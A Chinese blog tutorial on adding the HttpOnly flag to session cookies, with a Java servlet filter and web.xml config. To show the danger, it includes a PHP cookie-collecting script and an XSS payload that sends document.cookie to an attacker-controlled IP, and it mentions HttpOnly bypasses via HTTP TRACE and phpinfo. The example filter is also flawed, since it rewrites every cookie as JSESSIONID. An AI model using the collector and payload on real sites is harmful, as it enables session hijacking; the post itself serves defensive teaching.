360监测显示:cookie没有httponly标志解决方法

最新推荐文章于 2024-07-20 14:13:03 发布
最新推荐文章于 2024-07-20 14:13:03 发布
阅读量1.9w 收藏 3
点赞数
分类专栏: JavaEE-Web前台 Web前端-Javascript JavaEE-综合 文章标签: cookie http协议 javascript session 浏览器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35624642/article/details/72979056
版权

在介绍HttpOnly之前,我想跟大家聊聊Cookie及XSS。

随着B/S的普及,我们平时上网都是依赖于http协议完成,而Http是无状态的,即同一个会话的连续两个请求互相不了解,他们由最新实例化的环境进行解析,除了应用本身可能已经存储在全局对象中的所有信息外,该环境不保存与会话有关的任何信息,http是不会为了下一次连接而维护这次连接所传输的信息的。所以为了在每次会话之间传递信息,就需要用到cookie和session,无论是什么,都是为了让服务器端获得一个token来检查合法性,很多时候都是在cookie中存储一个sessionID,服务器来识别该用户,那么安全隐患也就引申而出了,只要获得这个cookie,就可以取得别人的身份,特别是管理员等高级权限帐号时,危害就大了,而XSS就是在别人的应用程序中恶意执行一段js以窃取用户的cookie。

那么如何获得Cookie劫持呢?在浏览器中的document对象中,就储存了Cookie的信息,而利用js可以把这里面的Cookie给取出来,只要得到这个Cookie就可以拥有别人的身份了。下面简单说说如何窃取cookie。

接收cookie的PHP文件ck.php为:

<?php 
$cookie = $_GET['c']; 
$ip = getenv ('REMOTE_ADDR'); 
$time=date("j F, Y, g:i a"); 
$referer=getenv ('HTTP_REFERER'); 
$fp = fopen('cookie.txt', 'a'); 
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>'); 
fclose($fp); 
?>

把这个文件放在自己的服务器上,比如我们搭建的服务器为:http://10.65.21.78:8080 .

那么构造XSS语句:

<script>window.open('http://10.65.21.78:8080/ck.php?c='+document.cookie)</script>

当执行script成功时就会把cookie发送到自己的服务器下cookie.txt文件中。XSS攻击是多么可怕的事情。

说了这么多,貌似还没有提到HttpOnly,这是哪般?莫及!这就到了!如何保障我们的Cookie安全呢?Cookie都是通过document对象获取的,我们如果能让cookie在浏览器中不可见就可以了,那HttpOnly就是在设置cookie时接受这样一个参数,一旦被设置,在浏览器的document对象中就看不到cookie了。而浏览器在浏览网页的时候不受任何影响,因为Cookie会被放在浏览器头中发送出去(包括Ajax的时候),应用程序也一般不会在JS里操作这些敏感Cookie的,对于一些敏感的Cookie我们采用HttpOnly,对于一些需要在应用程序中用JS操作的cookie我们就不予设置,这样就保障了Cookie信息的安全也保证了应用。

给浏览器设置Cookie的头如下:

Set-Cookie: =[; =]
[; expires=][; domain=]
[; path=][; secure][; HttpOnly]

如果 Cookie 具有 HttpOnly 特性且不能通过客户端脚本访问,则为 true;否则为 false。默认值为 false。

但是,也可以看到HttpOnly并不是万能的,首先它并不能解决XSS的问题,仍然不能抵制一些有耐心的黑客的攻击,甚至一些基于XSS的proxy也出现了,但是已经可以提高攻击的门槛了,起码XSS攻击不是每个脚本小子都能完成的了,而且其他的那些攻击手法因为一些环境和技术的限制,并不像Cookie窃取这种手法一样通用。

HttpOnly也是可能利用一些漏洞或者配置Bypass的,关键问题是只要能取到浏览器发送的Cookie头就可以了。譬如以前出现的Http Trace攻击就可以将你的Header里的Cookie回显出来,利用Ajax或者flash就可以完成这种攻击,这种手法也已经在Ajax和flash中获得修补。另外一个关于配置或者应用程序上可能Bypass的显著例子就是phpinfo,大家知道phpinfo会将浏览器发送的http头回显出来,其中就包括我们保护的auth信息,而这个页面经常存在在各种站点上,只要用ajax取phpinfo页面,取出header头对应的部分就可以获得Cookie了。一些应用程序的不完善也可能导致header头的泄露,这种攻击方式对于基本验证保护的页面一样可以攻击。

HttpOnly在IE 6以上,Firefox较新版本都得到了比较好的支持,并且在如Hotmail等应用程序里都有广泛的使用,并且已经是取得了比较好的安全效果。

那问题就来了,大家想想,HttpOnly 主要是为了限制web页面程序的browser端script程序读取cookie, 实际是浏览器通过协议实现限制的,黑客可不会那么傻,肯定不会用HTTP协议来读取cookie,肯定是在socket层面写抓包程序,相当于写一个低于IE6版本的应用程序。

所以,HttpOnly并不是万能的。但我们还是要做的。


那么我们该怎样去解决这个问题呢?很简单只需要一个拦截器即可:

代码如下:

CookieHttpOnlyFilter.Java:

package net.jeeshop.core.filter;
import java.io.IOException;
import java.text.SimpleDateFormat;
import java.util.Calendar;
import java.util.Date;
import java.util.Locale;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
/**
 * 解决检测到会话cookie中缺少HttpOnly属性的问题
 * @version 1.0
 * @project: jshop
 * @author:QC班长

 * @date:2017/6/10
 * @time:10:53
 */
public class CookieHttpOnlyFilter implements Filter {
    public void destroy() {

    }

    public void doFilter(ServletRequest request, ServletResponse response,
                         FilterChain filterChain) throws IOException, ServletException {
        // TODO Auto-generated method stub
        HttpServletRequest req = (HttpServletRequest) request;
        HttpServletResponse resp = (HttpServletResponse) response;
        Cookie[] cookies = req.getCookies();
        if(cookies!=null){
            for(Cookie cookie : cookies){
                String value = cookie.getValue();
                StringBuilder builder = new StringBuilder();
                builder.append("JSESSIONID=" + value + "; ");
                builder.append("Secure; ");
                builder.append("HttpOnly; ");
                Calendar cal = Calendar.getInstance();
                cal.add(Calendar.HOUR, 1);
                Date date = cal.getTime();
                Locale locale = Locale.CHINA;
                SimpleDateFormat sdf = new SimpleDateFormat("dd-MM-yyyy HH:mm:ss",locale);
                builder.append("Expires=" + sdf.format(date));
                resp.setHeader("Set-Cookie", builder.toString());
            }
            filterChain.doFilter(request, response);
        }
    }

    public void init(FilterConfig arg0) throws ServletException {
        // TODO Auto-generated method stub

    }
}
然后在配置文件中进行配置:

web.xml:

<!--解决检测到会话cookie中缺少HttpOnly属性的问题 -->
<filter>
    <filter-name>cookieHttpOnlyFilter</filter-name>
    <filter-class>net.jeeshop.core.filter.CookieHttpOnlyFilter</filter-class>
</filter>
<filter-mapping>
    <filter-name>cookieHttpOnlyFilter</filter-name>
    <url-pattern>/*</url-pattern>
</filter-mapping>
这样就好了。
QC班长
关注
专栏目录
【网络安全】XSS之HttpOnly防护(附实战案例)
等风来
09-01 555
HttpOnly作为一种重要的安全标志,主要用于防止攻击者通过XSS攻击窃取用户的Cookie数据,从而保护会话安全。在实现时,开发者只需要在设置Cookie时添加HttpOnly属性即可。然而,HttpOnly并不能完全消除XSS攻击的威胁,但在配合其他安全措施如Content Security Policy(CSP)和严格的输入验证时,能够有效提高Web应用的安全性。
WEB网站常见的攻击方法总结与原理分析
dvt777的博客
09-27 1万+
一个网站建立以后,如果不注意安全方面的问题,很容易被人攻击,下面就讨论一下几种常见的漏洞的简介与原理分析 一.跨站脚本攻击(xss)        恶意攻击者通过往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。下面我们来分析一下xss的特点: 1、耗时间 2、有一定几率不成功 3、没有相应的软件来完
Cookie没有HTTP Only标志漏洞
Min_Monk的博客
11-06 4148
会话cookie中缺少HttpOnly属性会导致攻击者可以通过程序(JS脚本、Applet等)获取到用户的cookie信息,造成用户cookie信息泄露,增加攻击者的跨站脚本攻击威胁。 HttpOnly是微软对cookie做的扩展,该值指定cookie是否可通过客户端脚本访问。Microsoft Internet Explorer 版本 6 Service Pack 1 和更高版本支持co...
COOKIE安全与防护
cheeseandcake的博客
05-28 1万+
目     录   摘要 关键词 一、 引言  二、 COOKIE概述  三、 COOKIE安全分析  四、 COOKIE惯性思维  五、 COOKIE防护  六、 总结  七、 参考文献: 15 摘要:Cookie是一小段文本信息,只能保存字符串,伴随着用户请求和页面在Web服务器和浏览器间传递,用来保持Web中的回话状态和缓存信息,记录用户的状态。Cooki
使用HttpOnly提升Cookie安全性
热门推荐
zzzmmmkkk的专栏
09-01 9万+
在介绍HttpOnly之前,我想跟大家聊聊Cookie及XSS。 随着B/S的普及,我们平时上网都是依赖于http协议完成,而Http是无状态的,即同一个会话的连续两个请求互相不了解,他们由最新实例化的环境进行解析,除了应用本身可能已经存储在全局对象中的所有信息外,该环境不保存与会话有关的任何信息,http是不会为了下一次连接而维护这次连接所传输的信息的。所以为了在每次会话之间传递信息,
HttpOnly介绍以及防止XSS攻击时的作用(转)
如果你真的想做一件事,你一定会找到方法; 如果你不想做一件事,你一定会找到借口。
01-12 918
[url=http://www.owasp.org/index.php/HTTPOnly]介绍HttpOnly、讨论HttpOnly、以及HttpOnly与各语言的集成(Java,.Net,PHP)[/url] 转自:[url=http://netsecurity.51cto.com/art/200902/111143.htm]利用HTTP-only Cookie缓解XSS之痛[/url] ...
HTTP-only Cookie:保护用户隐私的重要手段
最新发布
你若盛开,清风自来
07-20 1091
本文将介绍HTTP-only Cookie的概念、作用及其在实际项目中的应用,帮助读者更好地理解HTTP-only Cookie的重要性,提高网络安全防护能力。HTTP-only Cookie是一种特殊类型的Cookie,它只能通过HTTP协议发送和接收,不能通过JavaScript等客户端脚本访问。这意味着,即使攻击者通过XSS等手段获取了用户的Cookie,也无法通过客户端脚本读取或修改这些Cookie
cookie安全之HTTP -only
Whatsoever1的博客
04-14 660
的setHttpOnly方法用于设置cookie是否可以被认为是HTTPOnly。如果cookie中设置了only属性,则JavaScript脚本将无法读取cookie信息,防止XSS攻击。在php.ini中设置 session.cookie_httponly = 其值为1或者TRUE,来开启全局的CookieHttpOnly属性。
XSS漏洞学习笔记
qi_SJQ_的博客
12-31 2678
xss学习笔记
前端基础知识点-每天一个基本知识点(100+个前端小知识,你是否都知道?)
m0_67394006的博客
03-02 9223
文章目录 前言 第一回合 一、知识点:cookie(21/09/06) 二、知识点:节流和防抖(21/09/07) 三、知识点:var和let以及const(21/09/08) 四:知识点:深拷贝和浅拷贝(21/09/09) 五、知识点:作用域和作用域链(21/09/10) 六、知识点:从输入URL到页面展示这中间发生了什么(21/09/11) 七、知识点:重排和重绘(21/09/12) 八、知识点:TCP和UDP(21/09/13) 九、知识点:三次握手(21/09/15) 十、知识点:绝对定位和相对定
HTML5面试题
YaToue
04-10 1万+
HTML5面试题 一、 Doctype的作用? 严格模式和混杂模式的区分,以及如何触发这2种模式? 声明位于文档中的最前面,处于 标签之前。告知浏览器的解析器,用什么文档类型 规范来解析这个文档。 DOCTYPE不存在或格式不正确会导致文档以混杂模式呈现。 严格模式就是浏览器根据web标准去解析页面,是一种要求严格的DTD,不允许使用任何表现层的语法, 混杂模式是一种向后兼容的解析方法。 触发...
前端2020面试题195道
weijieyuhyt的博客
01-13 1万+
HTML5面试题 一、 Doctype的作用? 严格模式和混杂模式的区分,以及如何触发这2种模式? <!DOCTYPE> 声明位于文档中的最前面,处于 标签之前。告知浏览器的解析器,用什么文档类型 规范来解析这个文档。 DOCTYPE不存在或格式不正确会导致文档以混杂模式呈现。 严格模式就是浏览器根据web标准去解析页面,是一种要求严格的DTD,不允许使用任何表现层的语法, 混杂模式...
什么是HTTP-only Cookie,它有什么安全特性?
长风破浪会有时的博客
05-16 254
最主要的安全特性就是它能防止一些坏人(黑客)偷看你的小纸条(Cookie)上的信息。因为黑客通常会通过一些手段在你的浏览器里运行恶意程序(比如JavaScript),然后尝试读取或修改你的CookieCookie就像是小纸条,当你在浏览网站的时候,网站会把一些小纸条(Cookie)放在你的浏览器里。这样,当你下次再去这个网站的时候,网站就可以通过读取这些小纸条来认识你,并为你提供更好的服务。它的特殊之处在于,它只能被网站服务器读取和修改,而不能被浏览器里的其他程序(比如JavaScript)读取或修改。
Http-Only Cookie
weixin_30381317的博客
07-18 118
设置Cookie的时候,如果服务器加上了HttpOnly属性,则这个Cookie无法被JavaScript读取(即document.cookie不会返回这个Cookie的值),只用于向服务器发送。 Set-Cookie: key=value; HttpOnly 上面的这个Cookie将无法用JavaScript获取。进行AJAX操作时,XMLHttpRequest...
【转】HTTP-only Cookie 脚本获取JSESSIONID的方法
weixin_34321977的博客
10-14 491
2019独角兽企业重金招聘Python工程师标准>>> ...
利用HTTP-only Cookie缓解XSS
think_ycx的专栏
08-15 1066
原文地址 一、XSS与HTTP-only Cookie简介 跨站点脚本攻击是困扰Web服务器安全的常见问题之一。跨站点脚本攻击是一种服务器端的安全漏洞,常见于当把用户的输入作为HTML提交时,服务器端没有进行适当的过滤所致。跨站点脚本攻击可能引起泄漏Web 站点用户的敏感信息。为了降低跨站点脚本攻击的风险,微软公司的Internet Explorer 6 SP1引入了一项新的特性。
会话Cookies未被标记为HTTPOnly /Secure
weixin_45596492的博客
03-24 8857
会话Cookies未被标记为HTTPOnly 漏洞描述 如果在cookie上设置了HttpOnly属性,那么cookie的值就不能被客户端的JavaScript读取或设置。这项措施使某些客户端攻击(如跨站点脚本)更难被利用,因为它防止了客户端攻击通过注入脚本来获取cookie的值。 漏洞影响 如果cookie未设置HttpOnly属性,可能会很轻易的被诸如 XSS 这类攻击所窃取。 修复建议 通常建议对所有的cookie都设置HttpOnly标志。 除非你特别要求在你的应用程序中,通过合法的
HttpOnly Cookie 怎么讲
larance的挨踢生活
11-30 718
HttpOnly是加在cookies上的一个标识,用于告诉浏览器不要向客户端脚本(document.cookie或其他)暴露cookieHttpOnly背后的相关议题是:当网站存在跨站脚本攻击(XSS)漏洞时,黑客通过执行脚本获得cookie时被阻止,从而在根本上杜绝这种类型的攻击。 当你在cookie上设置HttpOnly标识后,浏览器就会知会到这是特殊的cookie,只能由服务器检索到,所有来自客户端脚本的访问都会被禁止。当然也有前提:使用新版的浏览器HttpOnly Cookie 最初由 Micr
我如何设置一个http only的cookie
m0_57236802的博客
08-15 3386
设置一个HttpOnlycookie 意味着该 cookie 不能通过客户端脚本(如 JavaScript)进行访问。这是一个安全措施,通常用于减少某些类型的攻击,如跨站脚本攻击 (XSS)。以下是如何在不同的上下文中设置HttpOnly
cookie设置HttpOnly标志
05-10
设置HttpOnly标志可以有效地防止跨站脚本攻击(XSS攻击)。HttpOnly标志可以防止客户端(如浏览器)通过JavaScript脚本来访问HTTP Cookie,从而增加了攻击者获取Cookie的难度。 在设置Cookie时,可以通过在Set-Cookie头中添加HttpOnly标志来启用它,例如: ``` Set-Cookie: mycookie=value; HttpOnly ``` 这样设置后,客户端无法通过JavaScript脚本来访问该Cookie。但是,需要注意的是,HttpOnly标志并不能完全保证Cookie的安全性,攻击者仍然可以通过其他方式来获取该Cookie。因此,在开发Web应用程序时,还需要注意其他安全问题,如跨站请求伪造(CSRF)攻击等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

QC班长

班长有话说:要是有瓶水喝就好了

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值